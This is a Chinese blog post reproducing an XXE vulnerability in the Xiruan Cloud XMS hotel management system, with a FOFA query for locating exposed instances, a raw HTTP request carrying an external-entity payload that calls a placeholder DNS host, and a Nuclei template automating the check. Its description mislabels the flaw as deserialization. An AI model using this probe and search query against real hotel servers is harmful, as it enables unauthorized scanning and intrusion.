西软云XMS operate XXE漏洞

最新推荐文章于 2024-05-20 02:54:15 发布
最新推荐文章于 2024-05-20 02:54:15 发布
阅读量720 收藏 10
点赞数 15
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136383058
版权

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。

西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。

Ⅱ、fofa语句

app="shiji-西软云XMS"

Ⅲ、漏洞复现

POC

POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://your-dns"> %remote;]>

1、发送数据包,访问DNSlog

2、查看DNSlog记录

Ⅳ、Nuclei-POC

id: Xiruan-XMS-operate-XXE

info:
  name: 西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="shiji-西软云XMS"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 0

        <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://{{interactsh-url}}"> %remote;]>

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
        condition: and

Ⅴ、修复建议

升级至安全版本

Love Seed
关注
  • 15
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
西软Smart版餐饮用户手册
02-05
西软Smart版餐饮用户手册,西软Smart版餐饮用户手册
5个烤烟新品种与云烟87的比较研究 (2011年)
05-10
为筛选出适应丽江地区烤烟种植区优质、适产、抗病性强的新品种,在2009~2010年于丽江市永胜县开展了以云烟87为对照,XYN87,云烟113,云烟114,云烟115,T29共5个新品种的区域试验。进行了生物学性状、抗病性、经济性状等观测分析。结果表明:在5个供试品种中,T29的经济性状最好,产量为3 256.35 kg/hm2;在抗病性上云烟113最优,白粉病病株率3.75%为最低;从化学成分上看,云烟115与129的糖碱比分别为10.78和9.31,化学成分最协调。两年的适应性研究结果的主成分分析法综
过往云烟.doc
09-16
过往云烟.doc
北京中科信软云架构培训
03-11
第一部分 虚拟化与云计算概念 第一天(上午) 主题 基本概念 大纲 l 虚拟化概论 l 虚拟化的关键技术 l 虚拟化的业界动态 l 云计算概论 l 云计算架构 l 云计算的关键技术与挑战 l 云计算的典型厂商的技术架构介绍 第二部分 XEN/KVM虚拟化技术 第一天(下午)~第二天(上午) 主题 虚拟化技术 大纲 l Xen的原理与实现 l Xen的安装 l Xen的配置和管理工具 l 虚拟操作系统的文件存储系统 l 常见问题处理 l 试验:XEN使用 l KVM的原理与实现 l 试验:KVM使用 第三部分 开源云计算平台部署 第二天(下午)~第四天 主题 Eucalyptus云计算系统实践 大纲 l Eucalyptus平台简介 l Eucalyptus部署及管理 n ◦Installing Eucalyptus (from source and binary packages) n ◦Eucalyptus configuration n ◦Hypervisor configuration n ◦Network configuration (networking modes, multi-cluster networking) n ◦Managing Eucalyptus n ◦Advanced networking and security n ◦Auto-scaling n ◦Hybrid clouds ("cloud bursting") n ◦Troubleshooting l Eucalyptus操作 n ◦Account creation n ◦Obtaining and using credentials n ◦Instance Management: n ◦Listing, running, and terminating instances n ◦Accessing and using instances n ◦Using Elasticfox n ◦Image Management (bundling, uploading and registering images) n ◦Networking and security (allocating and associating IP addresses, security groups) n ◦Storage Management: Using block storage via the Storage Controller (creating volumes, creating snapshots, creating volumes from snapshots) n ◦Using put-get bucket storage via Walrus l 试验:部署Eucalyptus,建立私有云计算平台。 l 试验:发布镜像
软云考试系统培训材料
02-10
高中学考培训教材
西软云XMS futurehotel/operate XXE漏洞复现
0xSec
02-29 633
西软云XMS/XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
西软云XMS 反序列化RCE漏洞复现
0xSec
12-29 1503
西软云XMS/fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。
远程命令执行漏洞原理,以及防护绕过方式
Scalzdp的专栏
11-21 1026
今天分享了远程执行指令的原理和如何进行远程执行指令漏洞的利用和绕过方法,远程命令执行漏洞危害性特别大,攻击者可以利用远程命令执行漏洞给运营团队带来如下一些危害:继承Web服务程序的权限去执行系统命令或读写文件、反弹shell、控制整个网站甚至服务器、进一步内网渗透。在防御的过程我们可以通过加强对用户输入的验证:比如限制输入内容,其次,采用最小权限原则,将程序运行权限限制在最低限度。
西软云XMS futurehotel/query XXE漏洞复现
0xSec
02-29 507
西软云XMS/XopServerRS/rest/futurehotel/query接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
西软云XMS-futurehotel/operate-XXE漏洞
cobra_cobra的博客
03-01 185
西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。FOFA:app="shiji-西软云XMS"
XMS3.3.0云餐饮操作说明书.pdf
05-27
西软餐饮操作手册
过往云烟是什么意思.doc
09-16
过往云烟是什么意思.doc
湖南软云存储科技有限公司IPFS Filecoin项目介绍.pptx
04-11
湖南软云存储科技有限公司IPFS Filecoin项目介绍.pptx
FOXHIS前台西软服务器端和客户端安装教程
热门推荐
飞越飘零的专栏
07-29 1万+
西软服务器端和客户端安装教程V1.0                                 前言:鉴于集团酒店开业速度迅猛,在系统预培训上存在一定延迟,现在根据实际情况,酒店管理集团在总部经过测试并安装过多台电脑,编写了以下安装流程,力求把所遇到的问题尽量呈现在本教程中。 暂时在数据库安装部分缺少图片,但是文字已有相当详细的描述,图片将在未来日子中补上,各兄弟酒店EDP请对
[xms]西软xms试算平衡报表-穿透明细报表-增加储值卡卡号列
浩秦的博客
10-11 521
只能呵呵哒 [xms]西软xms试算平衡报表-穿透明细报表-增加储值卡卡号列 pospay select menu,vipcard from pos_pay where paycode='9303' and hotelid='${hotelid}' union select menu,vipcard from pos_hpay where paycode='9303' ...
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 578
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
HCIP-Datacom-ARST自选题库_02_网络安全【道题】
最新发布
2301_80961833的博客
05-20 476
为了防止黑客通过MAC地址攻击用户设备或网络,可将非信任用户的MAC地址配置为黑洞MAC地址,过滤掉非法MAC地址。中间人攻击或IP/MAC Spoofing攻击都会导致信息泄露等危害,且在内网中比较常见,为了防止中间人攻击或IP/MACSpoofing攻击,可以采取以下哪些配置手段?多远题461/805、为了防止仿冒DHCP服务器接入网络,可以在交换机上开启DHCP Snooping功能,配置步骤包括以下哪些选项?开启DHCP Snooping检查DHCP REQUEST报文中CHADDR字段的功能。
西软云xms 反序列化
01-22
西软云XMS是一个云基础设施管理系统,其反序列化是指将已经串行化(序列化)的对象数据,重新转换为内存中的对象的过程。在西软云XMS中,反序列化是一个重要的功能,可以用于数据传输、持久化存储、跨系统通信等场景。 在西软云XMS中,反序列化的过程可以通过以下步骤实现: 首先,需要将已经序列化的数据进行传输或者存储。在传输时,可以通过网络传输协议(如HTTP、TCP/IP等)将数据传输给目标对象。在存储时,可以将数据写入到文件系统、数据库等持久化存储介质中。 接下来,接收方需要将接收到的序列化数据进行反序列化处理。在西软云XMS中,可以通过提供的反序列化接口或者方法来完成这一过程。反序列化接口会将接收到的数据进行解码,并根据序列化过程中的规则和约定,将数据重新转换为原始的对象数据。 最后,反序列化的结果将被存储在内存中的对象中,可以根据需要对这些对象进行进一步的操作和处理。在西软云XMS中,反序列化后的对象可以用于系统内部的数据处理、业务逻辑的执行、状态的恢复等方面。 总的来说,西软云XMS中的反序列化是一个将已序列化数据转换为内存中对象的过程,通过网络传输或者存储介质的数据读取,再通过反序列化接口将数据解码并转换为对象。这个过程在云基础设施管理系统中起到了重要的作用,用于实现数据的跨系统通信和持久化存储等功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值